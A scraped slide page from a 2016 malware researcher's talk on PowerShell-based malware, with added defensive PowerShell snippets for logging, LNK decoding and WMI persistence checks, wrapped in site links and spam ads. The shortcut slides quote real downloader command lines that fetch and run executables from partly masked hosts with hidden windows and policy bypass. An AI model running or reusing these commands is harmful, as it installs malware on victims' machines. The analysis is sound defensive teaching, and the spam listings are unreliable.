Introduction to Exploitation
 
Backtrack
BacktrackBacktrack
Backtrack
 
Open Source Malware Lab
Open Source Malware LabOpen Source Malware Lab
Open Source Malware Lab
 
Security Handbook
 Security Handbook Security Handbook
Security Handbook
 
DC612 Day - Hands on Penetration Testing 101
DC612 Day - Hands on Penetration Testing 101DC612 Day - Hands on Penetration Testing 101
DC612 Day - Hands on Penetration Testing 101
 
Flash it baby!
Flash it baby!Flash it baby!
Flash it baby!
 
Malware Analysis 101: N00b to Ninja in 60 Minutes at BSidesDC on October 19, ...
Malware Analysis 101: N00b to Ninja in 60 Minutes at BSidesDC on October 19, ...Malware Analysis 101: N00b to Ninja in 60 Minutes at BSidesDC on October 19, ...
Malware Analysis 101: N00b to Ninja in 60 Minutes at BSidesDC on October 19, ...
 
Bz backtrack.usage
Bz backtrack.usageBz backtrack.usage
Bz backtrack.usage
 
OISC 2019 - The OWASP Top 10 & AppSec Primer
OISC 2019 - The OWASP Top 10 & AppSec PrimerOISC 2019 - The OWASP Top 10 & AppSec Primer
OISC 2019 - The OWASP Top 10 & AppSec Primer
 
EMBA Firmware analysis - TROOPERS22
EMBA Firmware analysis - TROOPERS22EMBA Firmware analysis - TROOPERS22
EMBA Firmware analysis - TROOPERS22
 
AppSec & OWASP Top 10 Primer
AppSec & OWASP Top 10 PrimerAppSec & OWASP Top 10 Primer
AppSec & OWASP Top 10 Primer
 
OSCP Preparation Guide @ Infosectrain
OSCP Preparation Guide @ InfosectrainOSCP Preparation Guide @ Infosectrain
OSCP Preparation Guide @ Infosectrain
 
Malware analysis _ Threat Intelligence Morocco
Malware analysis _ Threat Intelligence MoroccoMalware analysis _ Threat Intelligence Morocco
Malware analysis _ Threat Intelligence Morocco
 
Securitytools
SecuritytoolsSecuritytools
Securitytools
 
EMBA - Firmware analysis - Black Hat Arsenal USA 2022
EMBA - Firmware analysis - Black Hat Arsenal USA 2022EMBA - Firmware analysis - Black Hat Arsenal USA 2022
EMBA - Firmware analysis - Black Hat Arsenal USA 2022
 
EMBA - Firmware analysis DEFCON30 demolabs USA 2022
EMBA - Firmware analysis DEFCON30 demolabs USA 2022EMBA - Firmware analysis DEFCON30 demolabs USA 2022
EMBA - Firmware analysis DEFCON30 demolabs USA 2022
 

More from Minseok(Jacky) Cha

백신 프로그램의 원리와 동작 차민석 20151117_security plus 발표판
백신 프로그램의 원리와 동작 차민석 20151117_security plus 발표판백신 프로그램의 원리와 동작 차민석 20151117_security plus 발표판
백신 프로그램의 원리와 동작 차민석 20151117_security plus 발표판
Minseok(Jacky) Cha
 
0과 1의 비밀을 밝히는 악성코드 분석가 차민석 20151117_security plus 발표판
0과 1의 비밀을 밝히는 악성코드 분석가 차민석 20151117_security plus 발표판0과 1의 비밀을 밝히는 악성코드 분석가 차민석 20151117_security plus 발표판
0과 1의 비밀을 밝히는 악성코드 분석가 차민석 20151117_security plus 발표판
Minseok(Jacky) Cha
 

More from Minseok(Jacky) Cha (16)

2017년 3분기 정보보안 소식 20180107 차민석
2017년 3분기 정보보안 소식 20180107 차민석2017년 3분기 정보보안 소식 20180107 차민석
2017년 3분기 정보보안 소식 20180107 차민석
 
Targeted attacks on major industry sectors in south korea 20171201 cha minseo...
Targeted attacks on major industry sectors in south korea 20171201 cha minseo...Targeted attacks on major industry sectors in south korea 20171201 cha minseo...
Targeted attacks on major industry sectors in south korea 20171201 cha minseo...
 
Targeted attacks on major industry sectores in south korea 20170927 cha minse...
Targeted attacks on major industry sectores in south korea 20170927 cha minse...Targeted attacks on major industry sectores in south korea 20170927 cha minse...
Targeted attacks on major industry sectores in south korea 20170927 cha minse...
 
2017년 1분기 정보보안 소식 20170528 차민석_공개판
2017년 1분기 정보보안 소식 20170528 차민석_공개판2017년 1분기 정보보안 소식 20170528 차민석_공개판
2017년 1분기 정보보안 소식 20170528 차민석_공개판
 
2016년 4분기 주요 정보보안 소식 20170101 차민석_공개판
2016년 4분기 주요 정보보안 소식 20170101 차민석_공개판2016년 4분기 주요 정보보안 소식 20170101 차민석_공개판
2016년 4분기 주요 정보보안 소식 20170101 차민석_공개판
 
2016년 3분기 주요 정보보안 소식 20161227 차민석_공개판
2016년 3분기 주요 정보보안 소식 20161227 차민석_공개판2016년 3분기 주요 정보보안 소식 20161227 차민석_공개판
2016년 3분기 주요 정보보안 소식 20161227 차민석_공개판
 
사회기반시설 공격 동향 분석보고서 차민석 20161029_레몬 정보보호 세미나
사회기반시설 공격 동향 분석보고서 차민석 20161029_레몬 정보보호 세미나사회기반시설 공격 동향 분석보고서 차민석 20161029_레몬 정보보호 세미나
사회기반시설 공격 동향 분석보고서 차민석 20161029_레몬 정보보호 세미나
 
2016년 2분기 주요 정보보안 소식 차민석 20160815_공개판
2016년 2분기 주요 정보보안 소식 차민석 20160815_공개판2016년 2분기 주요 정보보안 소식 차민석 20160815_공개판
2016년 2분기 주요 정보보안 소식 차민석 20160815_공개판
 
2016년 1분기 주요 정보보안 소식 차민석 20160703_공개판
2016년 1분기 주요 정보보안 소식 차민석 20160703_공개판2016년 1분기 주요 정보보안 소식 차민석 20160703_공개판
2016년 1분기 주요 정보보안 소식 차민석 20160703_공개판
 
2015년 4분기 주요 정보보안 소식 차민석 20160410_공개판
2015년 4분기 주요 정보보안 소식 차민석 20160410_공개판2015년 4분기 주요 정보보안 소식 차민석 20160410_공개판
2015년 4분기 주요 정보보안 소식 차민석 20160410_공개판
 
2015년 3분기 주요 정보보안 소식 차민석 20160117_공개판
2015년 3분기 주요 정보보안 소식 차민석 20160117_공개판2015년 3분기 주요 정보보안 소식 차민석 20160117_공개판
2015년 3분기 주요 정보보안 소식 차민석 20160117_공개판
 
Csi cyber season 1 episode 1 차민석 20160113
Csi cyber season 1 episode 1 차민석 20160113Csi cyber season 1 episode 1 차민석 20160113
Csi cyber season 1 episode 1 차민석 20160113
 
백신 프로그램의 원리와 동작 차민석 20151117_security plus 발표판
백신 프로그램의 원리와 동작 차민석 20151117_security plus 발표판백신 프로그램의 원리와 동작 차민석 20151117_security plus 발표판
백신 프로그램의 원리와 동작 차민석 20151117_security plus 발표판
 
0과 1의 비밀을 밝히는 악성코드 분석가 차민석 20151117_security plus 발표판
0과 1의 비밀을 밝히는 악성코드 분석가 차민석 20151117_security plus 발표판0과 1의 비밀을 밝히는 악성코드 분석가 차민석 20151117_security plus 발표판
0과 1의 비밀을 밝히는 악성코드 분석가 차민석 20151117_security plus 발표판
 
2015년 2분기 주요 정보보안 소식 차민석 공개판_20150810
2015년 2분기 주요 정보보안 소식 차민석 공개판_201508102015년 2분기 주요 정보보안 소식 차민석 공개판_20150810
2015년 2분기 주요 정보보안 소식 차민석 공개판_20150810
 
2015년 1분기 주요 정보보안 소식 20150512 공개판
2015년 1분기 주요 정보보안 소식 20150512 공개판2015년 1분기 주요 정보보안 소식 20150512 공개판
2015년 1분기 주요 정보보안 소식 20150512 공개판
 

Recently uploaded

+971581248768>> SAFE AND ORIGINAL ABORTION PILLS FOR SALE IN DUBAI AND ABUDHA...
+971581248768>> SAFE AND ORIGINAL ABORTION PILLS FOR SALE IN DUBAI AND ABUDHA...+971581248768>> SAFE AND ORIGINAL ABORTION PILLS FOR SALE IN DUBAI AND ABUDHA...
+971581248768>> SAFE AND ORIGINAL ABORTION PILLS FOR SALE IN DUBAI AND ABUDHA...
?#DUbAI#??##{{(☎️+971_581248768%)**%*]'#abortion pills for sale in dubai@
 
Cloud Frontiers: A Deep Dive into Serverless Spatial Data and FME
Cloud Frontiers:  A Deep Dive into Serverless Spatial Data and FMECloud Frontiers:  A Deep Dive into Serverless Spatial Data and FME
Cloud Frontiers: A Deep Dive into Serverless Spatial Data and FME
Safe Software
 
Cloud Frontiers: A Deep Dive into Serverless Spatial Data and FME
Cloud Frontiers:  A Deep Dive into Serverless Spatial Data and FMECloud Frontiers:  A Deep Dive into Serverless Spatial Data and FME
Cloud Frontiers: A Deep Dive into Serverless Spatial Data and FME
Safe Software
 
Architecting Cloud Native Applications
Architecting Cloud Native ApplicationsArchitecting Cloud Native Applications
Architecting Cloud Native Applications
WSO2
 
Finding Java's Hidden Performance Traps @ DevoxxUK 2024
Finding Java's Hidden Performance Traps @ DevoxxUK 2024Finding Java's Hidden Performance Traps @ DevoxxUK 2024
Finding Java's Hidden Performance Traps @ DevoxxUK 2024
Victor Rentea
 

Recently uploaded (20)

How to Troubleshoot Apps for the Modern Connected Worker
How to Troubleshoot Apps for the Modern Connected WorkerHow to Troubleshoot Apps for the Modern Connected Worker
How to Troubleshoot Apps for the Modern Connected Worker
 
Connector Corner: Accelerate revenue generation using UiPath API-centric busi...
Connector Corner: Accelerate revenue generation using UiPath API-centric busi...Connector Corner: Accelerate revenue generation using UiPath API-centric busi...
Connector Corner: Accelerate revenue generation using UiPath API-centric busi...
 
MS Copilot expands with MS Graph connectors
MS Copilot expands with MS Graph connectorsMS Copilot expands with MS Graph connectors
MS Copilot expands with MS Graph connectors
 
MINDCTI Revenue Release Quarter One 2024
MINDCTI Revenue Release Quarter One 2024MINDCTI Revenue Release Quarter One 2024
MINDCTI Revenue Release Quarter One 2024
 
DBX First Quarter 2024 Investor Presentation
DBX First Quarter 2024 Investor PresentationDBX First Quarter 2024 Investor Presentation
DBX First Quarter 2024 Investor Presentation
 
+971581248768>> SAFE AND ORIGINAL ABORTION PILLS FOR SALE IN DUBAI AND ABUDHA...
+971581248768>> SAFE AND ORIGINAL ABORTION PILLS FOR SALE IN DUBAI AND ABUDHA...+971581248768>> SAFE AND ORIGINAL ABORTION PILLS FOR SALE IN DUBAI AND ABUDHA...
+971581248768>> SAFE AND ORIGINAL ABORTION PILLS FOR SALE IN DUBAI AND ABUDHA...
 
CNIC Information System with Pakdata Cf In Pakistan
CNIC Information System with Pakdata Cf In PakistanCNIC Information System with Pakdata Cf In Pakistan
CNIC Information System with Pakdata Cf In Pakistan
 
Introduction to Multilingual Retrieval Augmented Generation (RAG)
Introduction to Multilingual Retrieval Augmented Generation (RAG)Introduction to Multilingual Retrieval Augmented Generation (RAG)
Introduction to Multilingual Retrieval Augmented Generation (RAG)
 
Cloud Frontiers: A Deep Dive into Serverless Spatial Data and FME
Cloud Frontiers:  A Deep Dive into Serverless Spatial Data and FMECloud Frontiers:  A Deep Dive into Serverless Spatial Data and FME
Cloud Frontiers: A Deep Dive into Serverless Spatial Data and FME
 
Platformless Horizons for Digital Adaptability
Platformless Horizons for Digital AdaptabilityPlatformless Horizons for Digital Adaptability
Platformless Horizons for Digital Adaptability
 
Cloud Frontiers: A Deep Dive into Serverless Spatial Data and FME
Cloud Frontiers:  A Deep Dive into Serverless Spatial Data and FMECloud Frontiers:  A Deep Dive into Serverless Spatial Data and FME
Cloud Frontiers: A Deep Dive into Serverless Spatial Data and FME
 
DEV meet-up UiPath Document Understanding May 7 2024 Amsterdam
DEV meet-up UiPath Document Understanding May 7 2024 AmsterdamDEV meet-up UiPath Document Understanding May 7 2024 Amsterdam
DEV meet-up UiPath Document Understanding May 7 2024 Amsterdam
 
[BuildWithAI] Introduction to Gemini.pdf
[BuildWithAI] Introduction to Gemini.pdf[BuildWithAI] Introduction to Gemini.pdf
[BuildWithAI] Introduction to Gemini.pdf
 
Artificial Intelligence Chap.5 : Uncertainty
Artificial Intelligence Chap.5 : UncertaintyArtificial Intelligence Chap.5 : Uncertainty
Artificial Intelligence Chap.5 : Uncertainty
 
Strategies for Landing an Oracle DBA Job as a Fresher
Strategies for Landing an Oracle DBA Job as a FresherStrategies for Landing an Oracle DBA Job as a Fresher
Strategies for Landing an Oracle DBA Job as a Fresher
 
Architecting Cloud Native Applications
Architecting Cloud Native ApplicationsArchitecting Cloud Native Applications
Architecting Cloud Native Applications
 
Apidays New York 2024 - The Good, the Bad and the Governed by David O'Neill, ...
Apidays New York 2024 - The Good, the Bad and the Governed by David O'Neill, ...Apidays New York 2024 - The Good, the Bad and the Governed by David O'Neill, ...
Apidays New York 2024 - The Good, the Bad and the Governed by David O'Neill, ...
 
FWD Group - Insurer Innovation Award 2024
FWD Group - Insurer Innovation Award 2024FWD Group - Insurer Innovation Award 2024
FWD Group - Insurer Innovation Award 2024
 
Finding Java's Hidden Performance Traps @ DevoxxUK 2024
Finding Java's Hidden Performance Traps @ DevoxxUK 2024Finding Java's Hidden Performance Traps @ DevoxxUK 2024
Finding Java's Hidden Performance Traps @ DevoxxUK 2024
 
Mcleodganj Call Girls 🥰 8617370543 Service Offer VIP Hot Model
Mcleodganj Call Girls 🥰 8617370543 Service Offer VIP Hot ModelMcleodganj Call Girls 🥰 8617370543 Service Offer VIP Hot Model
Mcleodganj Call Girls 🥰 8617370543 Service Offer VIP Hot Model
 

Power shell 악성코드 동향 20161118_차민석_디지털 포렌식 기술특강 공개판

  • 1. PowerMalware ?! 2016.11.18 – 공개판 안랩 시큐리티대응센터(ASEC) 분석팀 차민석 (車珉錫, CHA Minseok, Jacky Cha, mstoned7) 책임 연구원 PowerShell 를 이용한 악성코드와 기법
  • 2. © AhnLab, Inc. All rights reserved. 2 :~$whoami Profile − 차민석 (車珉錫, CHA Minseok, Jacky Cha, mstoned7) − 1988년 1월 7일 : Apple ][+ 복제품으로 컴퓨터 시작 − 1989년 : Brain virus 변형 감염 − 1997년 : AhnLab 입사 − AhnLab 책임 연구원 (Senior Malware Researcher) − 시큐리티 대응센터(ASEC) 분석팀에서 악성코드 분석 및 연구 중 - 민간합동 조사단, 사이버보안 전문단 - vforum, AVED, AMTSO 멤버 - Wildlist Reporter
  • 3. © AhnLab, Inc. All rights reserved. 3 :~$whoami • 책 -보안에미쳐라(2016) * Source:http://www.yes24.com/24/goods/29333992
  • 4. © AhnLab, Inc. All rights reserved. 4 시작하기 전에 • 보안이 완벽한 시스템은 이 세상에 없어 - MatthewBroderick주연위험한게임(WarGames) * Source:WarGames(1983)
  • 5. © AhnLab, Inc. All rights reserved. 5 Wrap up • PowerShell를 이용한 악성코드 증가 - Windows7와Windows10점유율에따름 -보통RansomwareDownloader로이용 -TargetedAttack에도이용시작포착 • WMI 이용 -Fileless악성코드제작가능 • 전망 -JS,VBS와함께PowerShell악성코드증가예상 -Multi-Platform악성코드가능성
  • 8. © AhnLab, Inc. All rights reserved. 8 PowerShell • PowerShell - 2006년공개된ScriptLanguage -WindowsVista이후기본탑재 * Source:https://msdn.microsoft.com/en-us/powershell
  • 9. © AhnLab, Inc. All rights reserved. 9 Windows Management Instrumentation (WMI) • WMI - * Source:https://msdn.microsoft.com/en-us/library/aa394582(v=vs.85).aspx
  • 10. © AhnLab, Inc. All rights reserved. 10 Windows Management Instrumentation (WMI) • WMIArchitecture - * Source:http://oversitesentry.com/blackhat-presentation-wmi-architecture-used-to-attack/
  • 11. © AhnLab, Inc. All rights reserved. 11 PowerShell + WMI • AntiVirus제품 정보 얻기 - get-wmiobject -Namespace rootSecurityCenter2 -Class AntiVirusProduct
  • 12. © AhnLab, Inc. All rights reserved. 12 PowerShell + WMI • 가상환경 검사 - Get-WmiObject –Class Win32_ComputerSystem
• 14. Timeline [timeline figure: years 1993, 1998, 2000, 2004, 2006, 2007, 2013, 2014, 2015, 2016, 2017; events shown: improved Batch virus, Macro virus, VBScript malware, Loveletter, Monad announced, PowerShell released, PowerShell malware PoC, PowerShell ransomware, Poweliks, Phase, Bedep, Kovter, WMI-based fileless intrusion, PowerShell + Macro appears, flood of PowerShell downloaders]
• 15. 1995 – Macro virus • 1995 – 2001: the heyday of the macro virus
• 16. 2000 - Loveletter • 2000-05-04: LoveLetter virus - spread by e-mail - social engineering using the mail subject "Iloveyou" - destroys image and music files
• 17. 2004 – Monad • Concern - Monad developed in 2004 * Source: https://www.virusbulletin.com/conference/vb2004/abstracts/return-script-viruses
• 18. 2006 - PowerShell malware PoC • PowerShell PoC malware * Source: https://www.symantec.com/security_response/writeup.jsp?docid=2006-080216-3625-99&tabid=2
• 19. 2006 - PowerShell Released • PowerShell released * Source: http://www.symantec.com/connect/ru/blogs/powershell-released?page=1
• 20. 2013 – PowerShell Ransomware • PowerShell ransomware appears * Source: https://nakedsecurity.sophos.com/2013/03/05/russian-ransomware-windows-powershell/
• 21. 2014 - Poweliks • Poweliks - stored inside the Registry * Source: http://blog.trendmicro.com/trendlabs-security-intelligence/poweliks-malware-hides-in-windows-registry/
• 22. 2014 - Phase • Phase - a variant of Solarbot, which was discovered in 2013 * Source: http://blog.trendmicro.com/trendlabs-security-intelligence/without-a-trace-fileless-malware-spotted-in-the-wild/
• 23. 2015 – WMI abuse • Black Hat 2015 * Source: https://www.blackhat.com/docs/us-15/materials/us-15-Graeber-Abusing-Windows-Management-Instrumentation-WMI-To-Build-A-Persistent%20Asynchronous-And-Fileless-Backdoor-wp.pdf
• 24. 2015 - PowerShell malware begins to increase • Increase in PowerShell malware * Source: https://securelist.com/blog/research/72417/the-rise-of-net-and-powershell-malware/
• 25. 2016 - Macro + PowerShell • Macro + PowerShell * Source: http://researchcenter.paloaltonetworks.com/2016/03/powersniff-malware-used-in-macro-based-attacks/
• 26. 2016 - Malware using PowerShell becomes widespread • Malware using PowerShell becomes widespread * Source: https://blogs.mcafee.com/mcafee-labs/malware-employs-powershell-to-infect-systems/
• 28. Conditions for In-the-Wild malware: a large user base; gaps in the security framework; easy to create
• 29. Advantages of PowerShell malware: powerful features; easy to create; possibility of bypassing behavior-based products
• 30. Main infection vectors • Mail − attachment or link • Web browser − via exploit kit − also used for fileless malware infections
• 31. Infection vectors • Mail
• 32. Running PowerShell • Execution permissions - Tested running the DownloadFile command on its own and inside a script - the individual command runs, but the script is blocked by the execution policy
• 33. Running PowerShell • Bypassing PowerShell execution policies * Source: https://technet.microsoft.com/en-us/library/ee176847.aspx
• 34. Running PowerShell • Bypassing PowerShell execution policies * Source: http://www.darkoperator.com/blog/2013/3/5/powershell-basics-execution-policy-part-1.html
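The execution-policy slides make the point that the policy stops a script file while a one-line command still runs, and that the policy itself can be bypassed. The defender-side consequence is that execution policy cannot be relied on as a control, so the useful checks are to know the effective policy per scope and to make sure the commands that do run get logged. The following is an added example, not code from the deck: it reports the policy per scope, enables PowerShell 5+ script block logging through the documented policy registry value, and reads back the resulting 4104 events. The "permissive" label and the choice of which events to show are this example's own.

```powershell
# Added example (not from the original slides). Run from an elevated PowerShell 5+
# session. Execution policy is a safety feature for users, not a security boundary;
# a -ExecutionPolicy bypass on the command line overrides the machine setting, so the
# record of what actually executed has to come from logging, not from the policy.

function Get-ExecutionPolicyReport {
    # One row per scope, listed from lowest to highest precedence (MachinePolicy first)
    Get-ExecutionPolicy -List | ForEach-Object {
        [pscustomobject]@{
            Scope  = $_.Scope
            Policy = $_.ExecutionPolicy
            Note   = if ($_.ExecutionPolicy -in 'Bypass', 'Unrestricted') { 'permissive' } else { '' }
        }
    }
}

# Documented Group Policy location for "Turn on PowerShell Script Block Logging"
$logKey = 'HKLM:\SOFTWARE\Policies\Microsoft\Windows\PowerShell\ScriptBlockLogging'

function Test-ScriptBlockLogging {
    $v = Get-ItemProperty -Path $logKey -Name EnableScriptBlockLogging -ErrorAction SilentlyContinue
    [bool]($v -and $v.EnableScriptBlockLogging -eq 1)
}

function Enable-ScriptBlockLogging {
    if (-not (Test-Path $logKey)) { New-Item -Path $logKey -Force | Out-Null }
    New-ItemProperty -Path $logKey -Name EnableScriptBlockLogging -PropertyType DWord -Value 1 -Force | Out-Null
}

function Get-RecentScriptBlocks([int]$Max = 20) {
    # Event 4104 in the PowerShell operational log carries the de-obfuscated script text;
    # Properties[2] is the ScriptBlockText field of that event.
    Get-WinEvent -FilterHashtable @{ LogName = 'Microsoft-Windows-PowerShell/Operational'; Id = 4104 } `
                 -MaxEvents $Max -ErrorAction SilentlyContinue |
        Select-Object TimeCreated, @{ n = 'ScriptBlock'; e = { $_.Properties[2].Value } }
}

Get-ExecutionPolicyReport | Format-Table -AutoSize
if (-not (Test-ScriptBlockLogging)) { Enable-ScriptBlockLogging }
Get-RecentScriptBlocks | Format-List
```

Script block logging records the script text after PowerShell has decoded it, so a downloader launched with -EncodedCommand or with string concatenation such as the 'tes'+'t3.e'+'xe' trick shown on the LNK slides appears in the 4104 event in readable form.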
• 35. Functionality • Downloader or dropper * Source: https://blogs.mcafee.com/mcafee-labs/malware-employs-powershell-to-infect-systems/
• 37. File types: Office (DOC, DOCM, XLS, XLSM); Shortcut (LNK); PowerShell (PS1); Windows Script File (WSF), HTML Application (HTA); JavaScript / Visual Basic Script (JS, JSE, VBS, VBE, WSF, HTA)
• 38. JavaScript - JS • JavaScript (JS)
• 39. Visual Basic Script • Visual Basic Script (VBS)
• 40. Windows Script File (WSF) • WSF (Windows Script File) - mostly JavaScript
• 41. Windows Script File (WSF) • WSF (Windows Script File)
• 42. HTML Application (HTA) • HTML Application (HTA) - mostly JavaScript
• 43. Office (DOC, DOCM, XLS, XLSM) • Documents containing macros
• 44. Shortcut (LNK) • LNK
• 45. Shortcut (LNK) • Download - %WINDIR%\System32\WindowsPowerShell\v1.0\powershell.exe $cmd = 'Start-Process';$b = '%TEMP%\tes'+'t3.e'+'xe'; $a = New-Object System.Net.WebClient; $a.DownloadFile('http://*****ennox.com/wp-includes/putty.exe','%TEMP%\tes'+'t3.e'+'xe'); &($cmd) -FilePath $b;
• 46. Shortcut (LNK) • Download - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -ExecutionPolicy bypass -noprofile -windowstyle hidden (New-Object System.Net.WebClient).DownloadFile('http://dire****.com/2D2A/bg.exe','%APPDATA%\Example.exe'); cmd /c '%APPDATA%\Example.exe'
• 47. Shortcut (LNK) • Encoding - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe -EncodedCommand UABvAHc………
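The three LNK slides show the PowerShell command line stored in a shortcut, once in clear text and once behind -EncodedCommand. The following is an added example of how an analyst reads that command line out of a shortcut without launching it and decodes the encoded form; it is not code from the deck. The shortcut path is a placeholder, the encoded sample is constructed inside the script, and the "Suspicious" heuristic is this example's own.

```powershell
# Added example (not from the original slides): read a shortcut's target and
# arguments through the WScript.Shell COM object (which parses the .lnk without
# running it) and decode an -EncodedCommand payload.

function Get-LnkCommandLine([string]$Path) {
    $shell = New-Object -ComObject WScript.Shell
    $lnk = $shell.CreateShortcut((Resolve-Path $Path).Path)
    [pscustomobject]@{
        Target     = $lnk.TargetPath
        Arguments  = $lnk.Arguments
        # Heuristic (assumption): a script host as target plus hidden-window, policy-bypass
        # or download switches in the arguments, the pattern seen on the slides
        Suspicious = ($lnk.TargetPath -match 'powershell|cmd\.exe|mshta|wscript|cscript') -and
                     ($lnk.Arguments -match '-e(nc|c)?\b|-w(indowstyle)?\s+hidden|bypass|DownloadFile|DownloadString')
    }
}

function Get-EncodedCommandFromArguments([string]$Arguments) {
    # -e, -ec, -enc and -EncodedCommand all take the same Base64 blob
    if ($Arguments -match '-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]+)') { $Matches[1] } else { $null }
}

function ConvertFrom-EncodedCommand([string]$Base64) {
    # -EncodedCommand is Base64 over the UTF-16LE bytes of the script, not UTF-8;
    # decoding as UTF-8 yields text interleaved with NUL characters.
    [Text.Encoding]::Unicode.GetString([Convert]::FromBase64String($Base64))
}

# Constructed, harmless sample of what a shortcut's argument string looks like (assumption)
$sampleScript = "Write-Output 'constructed sample'"
$sampleB64    = [Convert]::ToBase64String([Text.Encoding]::Unicode.GetBytes($sampleScript))
$sampleArgs   = "-NoProfile -WindowStyle Hidden -EncodedCommand $sampleB64"

$blob = Get-EncodedCommandFromArguments $sampleArgs
ConvertFrom-EncodedCommand $blob

# Against a real shortcut (placeholder path, not from the slides):
# $info = Get-LnkCommandLine 'C:\path\to\suspicious.lnk'
# if ($info.Suspicious) { ConvertFrom-EncodedCommand (Get-EncodedCommandFromArguments $info.Arguments) }
```

The UTF-16LE detail is the one that trips people up: the "UABvAHc" prefix on the slide is exactly what "Pow" looks like once each character is followed by a zero byte and the whole thing is Base64-encoded.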
• 48. PowerShell (PS1) • PowerShell
• 50. Fileless • Used as a fileless technique - Poweliks * Source: https://blog.gdatasoftware.com/2014/07/23947-poweliks-the-persistent-malware-without-a-file
• 51. Fileless • Used as a fileless technique - Poweliks
• 52. Fileless malware • Kovter - the Run entry cannot be read
• 53. Fileless malware • Kovter - runs its script through mshta.exe
• 54. Fileless malware • Kovter - encoded data
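The Poweliks and Kovter slides describe the fileless pattern: the payload lives in the registry, a Run entry that regedit cannot display starts a script host such as mshta.exe, and the actual code is stored encoded. Enumerating the Run keys through .NET rather than regedit still returns the value names and data, so the entries can be inspected. The following is an added detection example, not code from the deck; the list of keys and the flagging rules are this example's own choices.

```powershell
# Added example (not from the original slides): list Run/RunOnce values that start a
# script host instead of a program, carry encoded data, or have a name that a GUI
# tool cannot display, the traits the Poweliks/Kovter slides describe.

$runKeys = @(
    'HKCU:\Software\Microsoft\Windows\CurrentVersion\Run',
    'HKLM:\Software\Microsoft\Windows\CurrentVersion\Run',
    'HKCU:\Software\Microsoft\Windows\CurrentVersion\RunOnce',
    'HKLM:\Software\Microsoft\Windows\CurrentVersion\RunOnce'
)

function Get-SuspiciousRunEntries {
    foreach ($key in $runKeys) {
        if (-not (Test-Path $key)) { continue }
        $item = Get-Item $key
        foreach ($name in $item.GetValueNames()) {
            # Keep %VARS% unexpanded so the stored string is inspected as written
            $data = [string]$item.GetValue($name, '', 'DoNotExpandEnvironmentNames')
            $reasons = @()
            if ($data -match 'mshta|rundll32.*javascript:|powershell|wscript|cscript') { $reasons += 'launches a script host' }
            if ($data -match '-e(nc|c)?\s+[A-Za-z0-9+/=]{20,}|FromBase64String')         { $reasons += 'encoded payload' }
            if ($data.Length -gt 1024)                                                   { $reasons += 'unusually long value' }
            # Control characters in the name keep regedit from opening the value;
            # an empty (default) name with launcher data is the same trick seen from the API side.
            if ($name -match '[\x00-\x1F\x7F]')                                          { $reasons += 'control character in value name' }
            if ($name -eq '' -and $data -ne '')                                          { $reasons += 'default value carries a command' }
            if ($reasons.Count -gt 0) {
                [pscustomobject]@{
                    Key     = $key
                    Name    = $name
                    Reasons = ($reasons -join '; ')
                    Preview = $data.Substring(0, [Math]::Min(120, $data.Length))
                }
            }
        }
    }
}

Get-SuspiciousRunEntries | Format-List
```

A hit on "launches a script host" is not proof on its own, since some legitimate software starts through wscript, so the value data and the script it references are what to read next; the encoded-payload and control-character rules are the ones that rarely fire on clean machines.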
• 57. Error • Windows PowerShell has stopped working - a Windows PowerShell error can appear without warning
• 58. Response • WMI for Detection and Response * Source: https://ics-cert.us-cert.gov/sites/default/files/documents/WMI_for_Detection_and_Response_S508C.pdf
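The WMI slides cite the Black Hat 2015 work on persistent, fileless WMI backdoors and the ICS-CERT paper on using WMI for detection and response. The persistence mechanism in both is the same triple in root\subscription: an __EventFilter (a WQL trigger), an __EventConsumer (what runs) and a __FilterToConsumerBinding joining them. The following is an added example that lists those bindings with the command or script each consumer would run; it is not code from the deck, and the pairing of filter and consumer by name is this example's own approach.

```powershell
# Added example (not from the original slides): enumerate WMI permanent event
# subscriptions. Run as administrator; the namespace exists on every Windows host.

function Get-WmiPersistence {
    $ns = 'root\subscription'
    $filters   = @(Get-WmiObject -Namespace $ns -Class __EventFilter)
    # Querying the abstract base class returns every derived consumer instance
    $consumers = @(Get-WmiObject -Namespace $ns -Class __EventConsumer)
    $bindings  = @(Get-WmiObject -Namespace $ns -Class __FilterToConsumerBinding)

    foreach ($b in $bindings) {
        # Binding.Filter / Binding.Consumer are object paths such as __EventFilter.Name="X"
        $f = $filters   | Where-Object { $b.Filter   -like "*Name=`"$($_.Name)`"*" } | Select-Object -First 1
        $c = $consumers | Where-Object { $b.Consumer -like "*Name=`"$($_.Name)`"*" } | Select-Object -First 1
        $payload = switch ($c.__CLASS) {
            'CommandLineEventConsumer'  { $c.CommandLineTemplate }   # runs a command line
            'ActiveScriptEventConsumer' { $c.ScriptText }            # runs VBScript/JScript in-process
            default                     { '' }                       # log/event-log/SMTP consumers
        }
        [pscustomobject]@{
            FilterName   = $f.Name
            Query        = $f.Query
            ConsumerType = $c.__CLASS
            ConsumerName = $c.Name
            Payload      = $payload
        }
    }
}

Get-WmiPersistence | Format-List
```

On a clean Windows installation the list is short; the "SCM Event Log" filter/consumer pair is a Microsoft default, so anything beyond that, and in particular any CommandLineEventConsumer or ActiveScriptEventConsumer whose payload invokes powershell.exe, mshta.exe or an encoded command, deserves a look. The query text of the filter tells you the trigger (a timer, a process start, a logon), which is the part that makes the backdoor survive without any file on disk.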
• 59. Outlook • Expansion of PowerShell * Source: https://blogs.msdn.microsoft.com/powershell/2016/08/18/powershell-on-linux-and-open-source-2
• 60. Outlook: replacing JS and VBS?!; obfuscation; cross-platform
• 61. Wrap up • Increase in malware using PowerShell - follows the market share of Windows 7 and Windows 10 - usually used as a ransomware downloader - first use in targeted attacks observed • Use of WMI - fileless malware can be built • Outlook - PowerShell malware expected to grow alongside JS and VBS - possibility of multi-platform malware
• 62. The security problem today • Not really a fair fight * Source: http://image-store.slidesharecdn.com/81268b95-5c3b-4604-9129-d83ab3dc4600-large.png
• 63. The security problem today • Security is something everyone has to do together * Source: http://www.security-marathon.be/?p=1786
• 64. Q&A email: minseok.cha@ahnlab.com / mstoned7@gmail.com http://xcoolcat7.tistory.com https://twitter.com/xcoolcat7, https://twitter.com/mstoned7
• 65. Reference • Ryan Kazanciyan & Matt Hastings, 'Investigating PowerShell Attacks', 2014 • Matt Graeber, 'Abusing Windows Management Instrumentation (WMI) to Build a Persistent, Asynchronous, and Fileless Backdoor', 2015 • Santiago M. Pontiroli & F. Roberto Martinez, 'The Tao of .NET and PowerShell Malware Analysis', 2015 • 김승훈 / AhnLab, 'Macro Downloader Analysis', 2016